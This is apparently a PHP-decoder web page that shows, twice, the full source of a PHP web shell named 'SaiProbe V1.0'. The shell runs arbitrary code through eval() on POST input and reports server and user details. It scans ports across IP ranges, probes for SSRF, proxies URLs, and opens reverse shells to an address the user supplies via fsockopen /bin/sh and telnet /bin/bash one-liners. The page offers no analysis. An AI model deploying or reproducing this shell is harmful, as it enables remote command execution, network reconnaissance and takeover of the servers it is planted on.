Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?/* 1. 2. 3.php 4. 5.80Brupsuite 6. 7.phpinfo */ ..

Decoded Output download

<?/* 
    1. 
    2. 
    3.php 
    4. 
    5.80Brupsuite 
    6. 
    7.phpinfo 
*/ 
    error_reporting(0); // 
    set_time_limit(0); 
    ob_end_clean();     ////======================================================================================================== 
    class portScan{ 
        public $port; 
        function __construct(){ 
            $this->port=array('20','21','22','23','69','80','81','110','139','389','443','445','873','1090','1433','1521','2000','2181','3306','3389','5632','5672','6379','7001','8000','8069','8080','8081','9200','10050','10086','11211','27017','28017','50070'); 
        } 
        //url 
        function urlFilter($url){ 
            $pattern="/^(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])(\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])){3}$/"; 
            $match=preg_match($pattern,$url); 
            if(!$match){ 
                echo "<script>alert('ip')</script>"; 
                exit(""); 
            } 
            $url=str_replace("http://", "",$url); 
            $url=str_replace("/", "",$url); 
            return $url; 
        } 
        function Prepare(){ 
            if($_POST['end']!=""){          
                $base_url_1=self::urlFilter($_POST['start']);                   
                $base_url_2=self::urlFilter($_POST['end']); 
                /*$base_url_1=$_POST['start'];                  
                $base_url_2=$_POST['end'];*/ 
                $base_url=array($base_url_1,$base_url_2); 
                  
                self::Scan($base_url,$this->port); 
            }else{ 
                echo "<script>alert('')</script>"; 
            } 
        } 
        function outPut(){ 
  
        } 
        function Scan($base_url,$port){ 
            $start=explode('.',$base_url['0']); 
            $end=explode('.',$base_url['1']); 
            $length=$end['3']-$start['3']; 
            for($i=0;$i<=$length;$i++){ 
                $ip=$start[0].".".$start[1].".".$start[2].".".($start[3]+$i); 
                foreach ($port as $ports) { 
                    $ips="$ip:$ports";  
                    //stream_set_blocking($ips, 0);                
                    //$result=stream_socket_client($ips,$errno, $errstr,0.1,STREAM_CLIENT_CONNECT); 
                    $result=@fsockopen($ip,$ports,$errno,$errstr,0.1); 
                    if($result){ 
                        echo $ip."---------------------".$ports.""."<br>"; 
                        flush(); 
                    } 
                } 
            } 
        } 
    }//================================================================= 
    function ssrf($ip,$port=80){ 
        $res=fsockopen($ip,$port,$errno,$errstr,0.2); 
        if($res){ 
            echo ""; 
        }else{ 
            echo ""; 
        } 
  
    }//================================================================= 
    function tansmit($sourceip,$sourceport,$targetip,$targetport){ 
        if(strtsr(php_uname(),'Windows')){ 
  
        }elseif (strstr(php_uname(), 'Linux')) { 
              
        }else{ 
  
        } 
    }//============================Shell==================================== 
    function bounce($targetip,$targetport){ 
        if(substr(php_uname(), 0,1)=="W"){ 
            system("php -r '$sock=fsockopen($targetip,$targetport);exec('/bin/sh -i <&3 >&3 2>&3');'"); 
        }elseif (substr(php_uname(), 0,1)=="L") { 
            echo 'linux test'; 
            system('mknod inittab p && telnet {$targetip} {$targetport} 0<inittab | /bin/bash 1>inittab'); 
        }else{ 
            echo "<script>alert('Can't recognize this operation system!)</script>"; 
        } 
    }//================================================================== 
    function proxy($url){ 
        $output=file_get_contents($url); 
        return $output; 
    }//======================================Main=================================== 
    $scan=new portScan(); 
    if(isset($_POST['submit'])){ 
        if($_POST['start']!=""){ 
            $scan->Prepare(); 
        }else{ 
            echo "<script>alert('')</script>"; 
        }       
    } 
  
    if(isset($_GET['ip'])){ 
        $ssrf_ip=$_GET['ip']; 
        if($ssrf_ip!=0){ 
            ssrf($ssrf_ip); 
        } 
    } 
  
    if(isset($_POST['trans'])) { 
        tranmit($_POST['sourceip'],$_POST['sourceport'],$_POST['targetip'],$_POST['targetport']); 
    } 
  
    if(isset($_POST['rebound'])){ 
        bounce($_POST['tarip'],$_POST['tarport']); 
    } 
    if (isset($_GET['proxy'])) { 
        $proxy_web=proxy($_GET['proxy']); 
        echo "<div>".$proxy_web."</div>"; 
    }?><!--========================================================================================================================================================================================================================================================================================================================================--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>   <title>Sai V1.0</title> 
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css"></style></head> 
<div align="center"> 
    <h1>SaiProbe V1.0</h1><hr> 
    <div> 
        <a href="?id=1"></a>|<a href="?id=2"></a>|<a href="?id=3"></a>|<a href="?id=4"></a>|<a href="?id=5&ip=0"></a>|<a href="?id=6">phpinfo</a>|<a href="?id=7&proxy="></a>|<a href="#"></a> 
    </div> 
<hr> 
<!-------------------------------------------------------------> 
</div><div align="center" id="normal"> 
    <fieldset> 
        <legend></legend> 
    <table border="1" align="center" width="50%"> 
        <tr> 
            <td>IP/</td> 
            <td><?php echo $_SERVER['SERVER_NAME'];?>(<?php if('/'==DIRECTORY_SEPARATOR){echo $_SERVER['SERVER_ADDR'];}else{echo @gethostbyname($_SERVER['SERVER_NAME']);} ?>)</td> 
        </tr> 
        <tr> 
            <td></td> 
            <td><?php echo `whoami`?></td> 
        </tr> 
        <tr> 
            <td></td> 
            <td><?php echo $_SERVER['DOCUMENT_ROOT']?str_replace('\','/',$_SERVER['DOCUMENT_ROOT']):str_replace('\','/',dirname(__FILE__));?></td> 
        </tr> 
        <tr> 
            <td></td> 
            <td><?php echo str_replace('\','/',__FILE__)?str_replace('\','/',__FILE__):$_SERVER['SCRIPT_FILENAME'];?></td> 
        </tr> 
        <tr> 
            <td></td> 
            <td><?php echo $_SERVER['SERVER_PORT'];?></td> 
        </tr> 
        <tr> 
            <td></td> 
            <td><?php if($sysInfo['win_n'] != ''){echo $sysInfo['win_n'];}else{echo @php_uname();};?></td> 
        </tr> 
        <tr> 
            <td>PHP</td> 
            <td><?php echo PHP_VERSION;?></td> 
        </tr> 
        <tr> 
            <td>PHP</td> 
            <td><?php echo $_SERVER["PHPRC"];?></td> 
        </tr> 
    </table>  
    </fieldset> 
</div><!-------------------------------------------------------------><div align="center" style="display:none" id="command"> 
    <fieldset> 
        <legend></legend> 
            <form method="post" action="#"> 
                <div> 
                    <input type="text" placeholder="system(whoami)" name="order"/> 
                    <input type="submit" value=""> 
                </div> 
            </form> 
            <div> 
                    <textarea cols="150" rows="30" style="resize:none"> 
                        <? $order=$_POST['order'];echo eval($order.";");?> 
                    </textarea> 
            </div> 
    </fieldset>   
</div><!-------------------------------------------------------------><div align="center" style="display:none" id="inner"> 
    <fieldset> 
        <legend></legend> 
            <div> 
                <form method="post" action="#"> 
                Bash<input type="text" name="tarip" placeholder="IP"> 
                    <input type="text" name="tarport" placeholder="">  
                    <input type="submit" name="rebound" value=""> 
                </form> 
                <form method="post" action=""> 
                <input type="text" name="sourceip" placeholder="IP"><input type="text" name="sourceport" placeholder=""> 
                        <input type="text" name="targetip" placeholder="IP"><input type="text" name="targetport" placeholder=""> 
                        <input type="submit" name="trans" value=""> 
                <form> 
            </div> 
    </fieldset> 
</div><!-------------------------------------------------------------><div align="center" id="portscan" style="display:none"> 
    <fieldset> 
        <legend></legend> 
        <form action="#" method="post"> 
            <input type="text" name="start"> - 
            <input type="text" name="end"> 
            <input type="submit" name="submit" value=""> 
        </form> 
    </fieldset></div> 
  
<!-------------------------------------------------------------> 
<div align="center" id="ssrf" style="display:none"> 
    <fieldset> 
        <legend></legend> 
            <b>urlIPip,Brupsuit,80</b> 
    </fieldset> 
</div><!-----------------------------phpinfo--------------------------------><div align="center" id="phpinfo" style="display:none"> 
    <fieldset> 
        <legend>phpinfo</legend> 
        <?php phpinfo()?> 
    </fieldset></div> 
  
<!-------------------------------------------------------------> 
<div align="center" id="proxy" style="display:none"> 
    <fieldset> 
        <legend></legend> 
            <b>urlproxy</b> 
    </fieldset> 
</div><!-------------------------------------------------------------><div align="center" id="phpinfo" style="display:none"> 
    <fieldset> 
    </fieldset> 
</div><div align="center"><a href="http://www.heysec.org">Code by Sai</a></div><script type="text/javascript"> 
        var id=<?php echo $_GET['id'];?>; 
        var x; 
        switch (id){ 
            case 1: 
            break; 
            case 2: 
                document.getElementById("inner").style.display=''; 
            break; 
            case 3: 
                document.getElementById("command").style.display=''; 
            break; 
            case 4: 
                document.getElementById("portscan").style.display=''; 
            break; 
            case 5: 
                document.getElementById("ssrf").style.display=''; 
            break;          
            case 6: 
                document.getElementById("phpinfo").style.display=''; 
            break; 
            case 7: 
                document.getElementById("proxy").style.display=''; 
            break; 
        } 
    </script> 

Did this file decode correctly?

Original Code

<?/*
    1.
    2.
    3.php
    4.
    5.80Brupsuite
    6.
    7.phpinfo
*/
    error_reporting(0); //
    set_time_limit(0);
    ob_end_clean();     ////========================================================================================================
    class portScan{
        public $port;
        function __construct(){
            $this->port=array('20','21','22','23','69','80','81','110','139','389','443','445','873','1090','1433','1521','2000','2181','3306','3389','5632','5672','6379','7001','8000','8069','8080','8081','9200','10050','10086','11211','27017','28017','50070');
        }
        //url
        function urlFilter($url){
            $pattern="/^(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])(\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])){3}$/";
            $match=preg_match($pattern,$url);
            if(!$match){
                echo "<script>alert('ip')</script>";
                exit("");
            }
            $url=str_replace("http://", "",$url);
            $url=str_replace("/", "",$url);
            return $url;
        }
        function Prepare(){
            if($_POST['end']!=""){         
                $base_url_1=self::urlFilter($_POST['start']);                  
                $base_url_2=self::urlFilter($_POST['end']);
                /*$base_url_1=$_POST['start'];                 
                $base_url_2=$_POST['end'];*/
                $base_url=array($base_url_1,$base_url_2);
                 
                self::Scan($base_url,$this->port);
            }else{
                echo "<script>alert('')</script>";
            }
        }
        function outPut(){
 
        }
        function Scan($base_url,$port){
            $start=explode('.',$base_url['0']);
            $end=explode('.',$base_url['1']);
            $length=$end['3']-$start['3'];
            for($i=0;$i<=$length;$i++){
                $ip=$start[0].".".$start[1].".".$start[2].".".($start[3]+$i);
                foreach ($port as $ports) {
                    $ips="$ip:$ports"; 
                    //stream_set_blocking($ips, 0);               
                    //$result=stream_socket_client($ips,$errno, $errstr,0.1,STREAM_CLIENT_CONNECT);
                    $result=@fsockopen($ip,$ports,$errno,$errstr,0.1);
                    if($result){
                        echo $ip."---------------------".$ports.""."<br>";
                        flush();
                    }
                }
            }
        }
    }//=================================================================
    function ssrf($ip,$port=80){
        $res=fsockopen($ip,$port,$errno,$errstr,0.2);
        if($res){
            echo "";
        }else{
            echo "";
        }
 
    }//=================================================================
    function tansmit($sourceip,$sourceport,$targetip,$targetport){
        if(strtsr(php_uname(),'Windows')){
 
        }elseif (strstr(php_uname(), 'Linux')) {
             
        }else{
 
        }
    }//============================Shell====================================
    function bounce($targetip,$targetport){
        if(substr(php_uname(), 0,1)=="W"){
            system("php -r '$sock=fsockopen($targetip,$targetport);exec('/bin/sh -i <&3 >&3 2>&3');'");
        }elseif (substr(php_uname(), 0,1)=="L") {
            echo 'linux test';
            system('mknod inittab p && telnet {$targetip} {$targetport} 0<inittab | /bin/bash 1>inittab');
        }else{
            echo "<script>alert('Can't recognize this operation system!)</script>";
        }
    }//==================================================================
    function proxy($url){
        $output=file_get_contents($url);
        return $output;
    }//======================================Main===================================
    $scan=new portScan();
    if(isset($_POST['submit'])){
        if($_POST['start']!=""){
            $scan->Prepare();
        }else{
            echo "<script>alert('')</script>";
        }      
    }
 
    if(isset($_GET['ip'])){
        $ssrf_ip=$_GET['ip'];
        if($ssrf_ip!=0){
            ssrf($ssrf_ip);
        }
    }
 
    if(isset($_POST['trans'])) {
        tranmit($_POST['sourceip'],$_POST['sourceport'],$_POST['targetip'],$_POST['targetport']);
    }
 
    if(isset($_POST['rebound'])){
        bounce($_POST['tarip'],$_POST['tarport']);
    }
    if (isset($_GET['proxy'])) {
        $proxy_web=proxy($_GET['proxy']);
        echo "<div>".$proxy_web."</div>";
    }?><!--========================================================================================================================================================================================================================================================================================================================================--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>   <title>Sai V1.0</title>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css"></style></head>
<div align="center">
    <h1>SaiProbe V1.0</h1><hr>
    <div>
        <a href="?id=1"></a>|<a href="?id=2"></a>|<a href="?id=3"></a>|<a href="?id=4"></a>|<a href="?id=5&ip=0"></a>|<a href="?id=6">phpinfo</a>|<a href="?id=7&proxy="></a>|<a href="#"></a>
    </div>
<hr>
<!------------------------------------------------------------->
</div><div align="center" id="normal">
    <fieldset>
        <legend></legend>
    <table border="1" align="center" width="50%">
        <tr>
            <td>IP/</td>
            <td><?php echo $_SERVER['SERVER_NAME'];?>(<?php if('/'==DIRECTORY_SEPARATOR){echo $_SERVER['SERVER_ADDR'];}else{echo @gethostbyname($_SERVER['SERVER_NAME']);} ?>)</td>
        </tr>
        <tr>
            <td></td>
            <td><?php echo `whoami`?></td>
        </tr>
        <tr>
            <td></td>
            <td><?php echo $_SERVER['DOCUMENT_ROOT']?str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']):str_replace('\\','/',dirname(__FILE__));?></td>
        </tr>
        <tr>
            <td></td>
            <td><?php echo str_replace('\\','/',__FILE__)?str_replace('\\','/',__FILE__):$_SERVER['SCRIPT_FILENAME'];?></td>
        </tr>
        <tr>
            <td></td>
            <td><?php echo $_SERVER['SERVER_PORT'];?></td>
        </tr>
        <tr>
            <td></td>
            <td><?php if($sysInfo['win_n'] != ''){echo $sysInfo['win_n'];}else{echo @php_uname();};?></td>
        </tr>
        <tr>
            <td>PHP</td>
            <td><?php echo PHP_VERSION;?></td>
        </tr>
        <tr>
            <td>PHP</td>
            <td><?php echo $_SERVER["PHPRC"];?></td>
        </tr>
    </table> 
    </fieldset>
</div><!-------------------------------------------------------------><div align="center" style="display:none" id="command">
    <fieldset>
        <legend></legend>
            <form method="post" action="#">
                <div>
                    <input type="text" placeholder="system(whoami)" name="order"/>
                    <input type="submit" value="">
                </div>
            </form>
            <div>
                    <textarea cols="150" rows="30" style="resize:none">
                        <? $order=$_POST['order'];echo eval($order.";");?>
                    </textarea>
            </div>
    </fieldset>  
</div><!-------------------------------------------------------------><div align="center" style="display:none" id="inner">
    <fieldset>
        <legend></legend>
            <div>
                <form method="post" action="#">
                Bash<input type="text" name="tarip" placeholder="IP">
                    <input type="text" name="tarport" placeholder=""> 
                    <input type="submit" name="rebound" value="">
                </form>
                <form method="post" action="">
                <input type="text" name="sourceip" placeholder="IP"><input type="text" name="sourceport" placeholder="">
                        <input type="text" name="targetip" placeholder="IP"><input type="text" name="targetport" placeholder="">
                        <input type="submit" name="trans" value="">
                <form>
            </div>
    </fieldset>
</div><!-------------------------------------------------------------><div align="center" id="portscan" style="display:none">
    <fieldset>
        <legend></legend>
        <form action="#" method="post">
            <input type="text" name="start"> -
            <input type="text" name="end">
            <input type="submit" name="submit" value="">
        </form>
    </fieldset></div>
 
<!------------------------------------------------------------->
<div align="center" id="ssrf" style="display:none">
    <fieldset>
        <legend></legend>
            <b>urlIPip,Brupsuit,80</b>
    </fieldset>
</div><!-----------------------------phpinfo--------------------------------><div align="center" id="phpinfo" style="display:none">
    <fieldset>
        <legend>phpinfo</legend>
        <?php phpinfo()?>
    </fieldset></div>
 
<!------------------------------------------------------------->
<div align="center" id="proxy" style="display:none">
    <fieldset>
        <legend></legend>
            <b>urlproxy</b>
    </fieldset>
</div><!-------------------------------------------------------------><div align="center" id="phpinfo" style="display:none">
    <fieldset>
    </fieldset>
</div><div align="center"><a href="http://www.heysec.org">Code by Sai</a></div><script type="text/javascript">
        var id=<?php echo $_GET['id'];?>;
        var x;
        switch (id){
            case 1:
            break;
            case 2:
                document.getElementById("inner").style.display='';
            break;
            case 3:
                document.getElementById("command").style.display='';
            break;
            case 4:
                document.getElementById("portscan").style.display='';
            break;
            case 5:
                document.getElementById("ssrf").style.display='';
            break;         
            case 6:
                document.getElementById("phpinfo").style.display='';
            break;
            case 7:
                document.getElementById("proxy").style.display='';
            break;
        }
    </script>

Function Calls

None

Variables

None

Stats

MD5 a31e0bd6d6f1e43608920d1aa6c7963b
Eval Count 0
Decode Time 103 ms